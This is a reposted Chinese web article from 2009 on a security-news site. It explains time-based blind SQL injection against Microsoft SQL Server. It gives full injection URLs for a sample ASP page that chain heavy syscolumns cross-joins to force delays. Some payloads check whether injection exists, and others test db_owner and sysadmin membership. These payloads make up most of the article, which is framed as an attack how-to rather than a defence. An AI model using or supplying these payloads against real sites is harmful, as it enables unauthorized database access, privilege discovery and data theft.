当前位置:七道奇文章资讯安全技术网络技术
日期:2009-07-04 17:39:00  来源:本站整理

基于超时的MSSQL盲目注入[网络技术]

赞助商链接



  本文“基于超时的MSSQL盲目注入[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

作者:night
根源:www.54rk.cn

假定有这么一个文件,无论你怎么注入它页面内容都一样.但是他代码却确切存在注入点.
select * from table where columnid = $input_id
通过文件返回错误来注入是绝对不大概的.因为他页面内容始终一样.这样的漏洞页面绝对有的.
自己可以构造出来.

这时刻我们怎么注入列?
我们用 基于时间的盲目注入.

先看两条语句:

select * from sysobjects where id=1 and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=1

select * from sysobjects where id=1 and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=2

第一条语句绝对超时,网页在半小时内应当不会返回后果,第二条即刻就返回后果.
假如你测试后果跟我说的有出入,那么你就把
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6
换成
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6.....syscolumns AS sys100
一共100个,还不超时你的电脑就是外星的了.

好目前假定漏洞页面http://127.0.0.1/xml/mssql/index.asp?id=1

我们来这样注入:


http://127.0.0.1/xml/mssql/index.asp?id=1  and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=1

http://127.0.0.1/xml/mssql/index.asp?id=1  and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=2

假如返回时间相差N多,那么绝对有注入.目前我们来判断权限.

http://127.0.0.1/xml/mssql/index.asp?id=1  and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=(SELECT IS_MEMBER('db_owner'))

http://127.0.0.1/xml/mssql/index.asp?id=1  and (SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
and 1=(SELECT IS_MEMBER('sysadmin'))

其他注入参考网上其他的教程了.
只要改正and 1=(SELECT IS_MEMBER('sysadmin'))就行.

因为假如你的条件不成立,那么
(SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
判断就不会进入,假如你的条件成立
(SELECT count(*) FROM syscolumns AS sys1,
syscolumns as sys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)>0
判断就会履行完.
所以,假如网页超时,表示你的条件就成立.
你就猜中了信息.假如不超时,证明你的猜想条件是错误的.

----------关于这文章我已经公布好久了,但是就是没人给我一个反映..我去年写的
到本年一点反映都没有,我都不知道有没有错
 


  以上是“基于超时的MSSQL盲目注入[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
  • 基于超时的MSSQL盲目注入
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .